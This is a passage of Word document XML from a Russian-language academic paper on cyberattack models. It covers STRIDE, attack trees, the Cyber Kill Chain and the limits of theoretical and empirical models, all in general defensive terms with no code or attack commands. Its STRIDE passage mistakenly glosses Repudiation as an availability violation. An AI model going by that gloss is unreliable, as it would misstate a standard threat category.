        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E40AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.3. Структура модели атаки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401D1F5D" w14:textId="0F0F40F1" w:rsidR="00C079FC" w:rsidRDefault="004A47AB" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A47AB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Каждая модель атаки состоит из нескольких уровней, начиная с комплексного уровня, на котором определяются цели атаки, таких как система, данные или сервисы. Затем переходит на сценарный уровень, где рассматриваются конкретные шаги, которые предпринимает злоумышленник, включая разведку, использование уязвимостей и внедрение вредоносного ПО. На каждом этапе сценария определяются действия, направленные на компрометацию системы, что помогает глубже понять процесс атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573B2914" w14:textId="77777777" w:rsidR="00C079FC" w:rsidRDefault="00C079FC" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C4ADD47" w14:textId="7B2C3CE1" w:rsidR="00C079FC" w:rsidRPr="007E0BCF" w:rsidRDefault="004A47AB" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E0BCF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>2.4. Применение моделей атак в реальной практике</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3E43CE" w14:textId="6D670ADE" w:rsidR="004A47AB" w:rsidRDefault="004A47AB" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A47AB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Модели атак, как теоретические, так и эмпирические, активно применяются в реальной практике. Например, на основе теоретических моделей можно строить системы защиты и прогнозировать возможные уязвимости, в то время как эмпирические модели помогают разрабатывать действия по защите на основе реальных инцидентов и опытов с предыдущими кибератаками. Эти модели могут быть использованы для тренировки сотрудников по реагированию на угрозы и разработки планов реагирования в случае атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2518C9A1" w14:textId="77777777" w:rsidR="004A47AB" w:rsidRDefault="004A47AB" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="377513DC" w14:textId="6B00F18C" w:rsidR="00C079FC" w:rsidRPr="007E0BCF" w:rsidRDefault="004A47AB" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E0BCF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>2.5. Технологические и практические ограничения в моделях атак</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6532F0F6" w14:textId="77777777" w:rsidR="00C079FC" w:rsidRDefault="004A47AB" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A47AB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Несмотря на все преимущества, у моделей атак есть и ограничения. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ACB22E" w14:textId="77777777" w:rsidR="00C079FC" w:rsidRDefault="004A47AB" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A47AB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Теоретические модели часто бывают слишком абстрактными и не всегда могут отразить реальное поведение злоумышленников. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D4E551" w14:textId="77777777" w:rsidR="00C079FC" w:rsidRDefault="004A47AB" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A47AB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Эмпирические модели, несмотря на их практическую ценность, могут отставать от современных угроз, так как они основаны на прошлом опыте. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593AAB8B" w14:textId="1B2F60F6" w:rsidR="004A47AB" w:rsidRDefault="004A47AB" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A47AB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Симуляционные модели требуют значительных вычислительных ресурсов и опытных специалистов для эффективного применения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A77DCF" w14:textId="77777777" w:rsidR="00B47C64" w:rsidRPr="004A47AB" w:rsidRDefault="00B47C64" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="616BAC9A" w14:textId="4B9229C4" w:rsidR="0046024C" w:rsidRDefault="0046024C" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0046024C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">ГЛАВА III. </w:t>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="_Hlk192944888"/>
      <w:r w:rsidRPr="0046024C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ТЕОРЕТИЧЕСКИЕ И ЭМПИРИЧЕСКИЕ МОДЕЛИ АТАК</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="41592D8D" w14:textId="77777777" w:rsidR="00B47C64" w:rsidRPr="0046024C" w:rsidRDefault="00B47C64" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F687082" w14:textId="3F3EB03B" w:rsidR="0046024C" w:rsidRPr="008011DB" w:rsidRDefault="0046024C" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008011DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>3.1. Теоретические модели атак: основы и применение</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0EBACF" w14:textId="0383EA47" w:rsidR="0046024C" w:rsidRDefault="0046024C" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0046024C">
        <w:rPr>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Теоретические модели атак описывают возможные сценарии взлома системы на основе логики и математических расчетов. Эти модели основываются на формализованных представлениях, которые помогают прогнозировать угрозы и уязвимости в системе, прежде чем они могут быть использованы злоумышленниками. Одной из таких моделей является STRIDE, которая классифицирует угрозы по шести направлениям: подделка (Spoofing), порча данных (Tampering), утечка информации (Information Disclosure), отказ в обслуживании </w:t>
      </w:r>
      <w:r w:rsidRPr="0046024C">
        <w:rPr>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">(Denial of Service), повышение привилегий (Elevation of Privilege) и нарушение доступности (Repudiation). Теоретические модели хорошо работают на этапе проектирования системы, когда важно заранее предусмотреть возможные угрозы и уязвимости, а также создать архитектуру, способную противостоять этим угрозам. Важно, что такие модели не всегда могут учесть все аспекты реальной угрозы, но они играют ключевую роль в начале разработки систем безопасности. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BF4C27" w14:textId="77777777" w:rsidR="001470DA" w:rsidRDefault="001470DA" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="169F346E" w14:textId="62FB8F96" w:rsidR="0046024C" w:rsidRPr="008011DB" w:rsidRDefault="0046024C" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008011DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>3.2. Пример дерева атак</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DF9477" w14:textId="77777777" w:rsidR="001470DA" w:rsidRDefault="0046024C" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0046024C">
        <w:rPr>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Дерево атак — это графическое представление всех возможных путей, которыми может воспользоваться злоумышленник для достижения своей цели. Оно начинается с главной цели атаки, например, получение доступа к базе данных, и далее показывает возможные методы для достижения этой цели, включая все возможные уязвимости и обходные пути. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312639D7" w14:textId="442E8EBA" w:rsidR="001470DA" w:rsidRDefault="001470DA" w:rsidP="001470DA">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="383162A4" wp14:editId="7773A75B">
            <wp:extent cx="5505450" cy="2862786"/>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561" t="3552" r="2963" b="7377"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5524117" cy="2872493"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A9764C" w14:textId="3BAF592F" w:rsidR="001470DA" w:rsidRPr="00BC25C4" w:rsidRDefault="001470DA" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005412C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис. </w:t>
      </w:r>
      <w:r w:rsidR="00BC25C4" w:rsidRPr="0052558A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="000262BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="005412C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0052558A">
        <w:t>Подробное д</w:t>
      </w:r>
      <w:r w:rsidR="0052558A" w:rsidRPr="00322E27">
        <w:t>ерево событий атаки на рабочую станцию</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EFA082" w14:textId="007F30B7" w:rsidR="0046024C" w:rsidRDefault="0046024C" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0046024C">
        <w:rPr>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Это дерево помогает не только выявить уязвимости, но и систематизировать знания о возможных методах атаки, что позволяет эффективно планировать защиту. Использование такого подхода помогает определять критические точки системы, которые должны быть защищены в первую очередь. Дерево атак служит важным инструментом в процессе тестирования на проникновение (penetration testing), что позволяет моделировать реальные сценарии атак и искать способы их предотвращения. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40986CAD" w14:textId="77777777" w:rsidR="001470DA" w:rsidRDefault="001470DA" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64DADEED" w14:textId="77777777" w:rsidR="0046024C" w:rsidRDefault="0046024C" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C305448" w14:textId="77777777" w:rsidR="0046024C" w:rsidRPr="008011DB" w:rsidRDefault="0046024C" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008011DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>3.3. Эмпирические модели атак: анализ реальных инцидентов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F441E4" w14:textId="4A908F9C" w:rsidR="0046024C" w:rsidRDefault="0046024C" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0046024C">
        <w:rPr>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Эмпирические модели атак строятся на основе анализа реальных инцидентов, атак и статистики. Примером такой модели является Cyber Kill Chain, которая состоит из нескольких </w:t>
      </w:r>
      <w:r w:rsidRPr="0046024C">
        <w:rPr>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">этапов атаки: разведка, доставка вредоносного ПО, эксплуатация уязвимостей, установление бекдоров и, наконец, кража данных. Каждый из этих этапов предполагает возможность выявления и нейтрализации угрозы на определенном уровне атаки. Эмпирические модели помогают строить практичные системы защиты, основанные на опыте реальных атак и инцидентов, что делает их особенно ценными для разработки оперативных защитных мер. Эти модели могут быть использованы для мониторинга в реальном времени, создания системы раннего предупреждения и реакции на угрозы. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72677B12" w14:textId="77777777" w:rsidR="0046024C" w:rsidRDefault="0046024C" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40F03803" w14:textId="67C06A9F" w:rsidR="0046024C" w:rsidRPr="008011DB" w:rsidRDefault="0046024C" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008011DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>3.4. Преимущества и ограничения эмпирических моделей</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B2CE34" w14:textId="7DCAC38C" w:rsidR="00062036" w:rsidRDefault="0046024C" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0046024C">
        <w:rPr>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Эмпирические модели имеют ряд преимуществ: они более реалистичны и базируются на реальных событиях, что делает их полезными для оперативного реагирования на угрозы. Применение таких моделей позволяет защитникам сфокусироваться на фактических уязвимостях, которые могут быть использованы злоумышленниками, и применить более точные и соответствующие меры. Однако их ограничением является зависимость от уже произошедших инцидентов. Они учат на примере прошлых атак и не всегда могут предсказать новые угрозы, которые могут возникнуть в будущем. Эти модели, как правило, основаны на статичных данных и могут быть недостаточно гибкими для прогнозирования быстро развивающихся угроз, таких как новые виды вредоносного ПО или инновационные способы обхода систем безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BCDB93" w14:textId="77777777" w:rsidR="00383137" w:rsidRPr="00383137" w:rsidRDefault="00383137" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="260F934B" w14:textId="77777777" w:rsidR="00383137" w:rsidRDefault="00383137" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00383137">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">ГЛАВА </w:t>
      </w:r>
      <w:r w:rsidRPr="00383137">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>IV</w:t>
      </w:r>
      <w:r w:rsidRPr="00383137">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>. МЕТОДЫ ЗАЩИТЫ И АНАЛИЗ УГРОЗ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF3A466" w14:textId="77777777" w:rsidR="00383137" w:rsidRPr="008011DB" w:rsidRDefault="00383137" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00383137">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008011DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>4.1. Анализ уязвимостей: поиск слабых мест в системе</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236D8EA4" w14:textId="3D05DD5B" w:rsidR="00BF5FF6" w:rsidRDefault="00383137" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00383137">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
